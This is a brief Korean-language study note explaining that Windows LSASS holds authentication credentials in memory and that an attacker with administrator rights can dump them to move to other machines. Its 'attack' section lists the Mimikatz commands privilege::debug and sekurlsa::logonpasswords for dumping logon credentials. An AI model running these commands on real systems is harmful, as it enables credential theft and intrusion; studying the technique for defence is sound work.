요약

1. LSASS는 윈도우의 로그인과 보안을 담당하는 핵심 관리자다.
2. 매번 비밀번호를 치지 않게 하려고 중요한 인증 정보들을 메모리에 들고 있다.
3. 공격자가 관리자 권한을 뺏으면 이 메모리를 통째로 털어 다른 컴퓨터까지 침투할 수 있는 마스터키를 얻게 된다.

공격

Mimikatz

privilege::debug # Enables the SeDebugPrivilege to read and manipulate memory
sekurlsa::logonpasswords